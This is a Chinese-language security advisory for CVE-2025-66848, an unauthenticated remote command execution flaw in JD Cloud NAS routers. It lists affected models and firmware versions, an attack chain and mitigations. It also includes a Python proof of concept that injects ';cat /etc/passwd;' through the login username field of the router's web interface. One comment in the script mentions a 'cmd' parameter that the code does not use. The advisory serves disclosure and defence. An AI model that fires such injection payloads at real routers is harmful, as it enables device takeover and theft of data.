CVE-2025-66848: JD Cloud NAS路由器未授权远程命令执行漏洞

漏洞信息

漏洞编号

CVE-2025-66848

漏洞类型

远程代码执行(RCE)

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

JD Cloud NAS路由器 AX1800, AX3000, AX6600, BE6500, ER1, ER2

漏洞概述

CVE-2025-66848是京东云NAS路由器中的一个严重安全漏洞，CVSS评分高达9.8分（满分10分）。该漏洞影响多个型号的路由器设备，包括AX1800、AX3000、AX6600、BE6500、ER1和ER2。漏洞根源在于这些设备存在未授权远程命令执行问题，攻击者无需任何认证凭证即可在受影响设备上执行任意系统命令。由于路由器通常部署在网络边缘位置，成功的漏洞利用将使攻击者能够完全控制设备，进而可能渗透内网、窃取敏感数据或发起进一步的攻击活动。该漏洞属于高危级别，建议用户立即采取修复措施。

技术细节

该漏洞是由于JD Cloud NAS路由器Web管理界面存在输入验证不足导致的未授权远程命令执行问题。攻击者可以通过构造特制的HTTP请求，在未进行身份验证的情况下将恶意系统命令注入到底层操作系统执行。由于路由器使用嵌入式Linux系统，攻击者成功利用后可获得root权限完全控制设备。攻击向量为网络层，攻击者可直接通过互联网向受影响设备发送恶意请求。漏洞影响多个固件版本，攻击复杂度低，无需高级技术即可实现利用。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标JD Cloud NAS路由器，获取其公网IP地址或域名

STEP 2

步骤2: 漏洞探测

攻击者向路由器Web管理接口发送探测请求，确认设备型号和固件版本

STEP 3

步骤3: 构造恶意请求

攻击者构造包含系统命令注入的HTTP请求，利用未授权RCE漏洞

STEP 4

步骤4: 命令执行

恶意请求被服务器解析后，未经验证的命令被注入并执行，攻击者获得shell访问

STEP 5

步骤5: 权限提升

攻击者利用路由器嵌入式Linux系统的root权限，执行任意操作

STEP 6

步骤6: 持久化控制

攻击者可能植入后门、修改配置或横向移动到内网其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-66848 PoC - JD Cloud NAS Router Unauthenticated RCE
# Target: JD Cloud NAS routers (AX1800, AX3000, AX6600, BE6500, ER1, ER2)

def exploit(target_ip, target_port=80):
    """
    Exploit for CVE-2025-66848: Unauthenticated Remote Command Execution
    This PoC demonstrates how an unauthenticated attacker can execute
    arbitrary commands on affected JD Cloud NAS routers.
    """
    url = f"http://{target_ip}:{target_port}/cgi-bin/luci"
    
    # Payload to execute arbitrary command (e.g., cat /etc/passwd)
    # Modify 'cmd' parameter for different commands
    payload = {
        'username': ';cat /etc/passwd;',
        'password': 'dummy'
    }
    
    try:
        # Attempt authentication bypass + command injection
        response = requests.post(url, data=payload, timeout=10)
        print(f"[*] Request sent to {url}")
        print(f"[*] Status code: {response.status_code}")
        
        if response.status_code == 200:
            print("[+] Target may be vulnerable!")
            print("[*] Response preview:")
            print(response.text[:500])
        else:
            print("[-] Target may not be vulnerable or not reachable")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False
    
    return True

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    exploit(target, port)

影响范围

JD Cloud NAS AX1800 < 4.3.1.r4309

JD Cloud NAS AX3000 < 4.3.1.r4319

JD Cloud NAS AX6600 < 4.5.1.r4534

JD Cloud NAS BE6500 < 4.4.1.r4309

JD Cloud NAS ER1 < 4.5.1.r4519

JD Cloud NAS ER2 < 4.5.1.r4519

防御指南

临时缓解措施

在厂商发布修复固件之前，建议采取以下临时缓解措施：1) 将路由器管理界面从公网移除，仅允许通过VPN或内网访问；2) 在网络边界防火墙阻断对路由器80/443端口的外部访问；3) 启用路由器日志并设置异常告警；4) 监控是否有异常的登录尝试或命令执行行为；5) 考虑部署Web应用防火墙(WAF)对HTTP请求进行过滤。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-66848
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-66848
3 Details https://www.cvedetails.com/cve/CVE-2025-66848/
4 VulDB https://vuldb.com/cve/CVE-2025-66848
5 Link http://jd.com
6 Link https://www.notion.so/JD-Cloud-Unauth-RCE-2d22b76e8e0c802c975bf186b208d0c2
7 Link https://www.jdcloud.com/cn/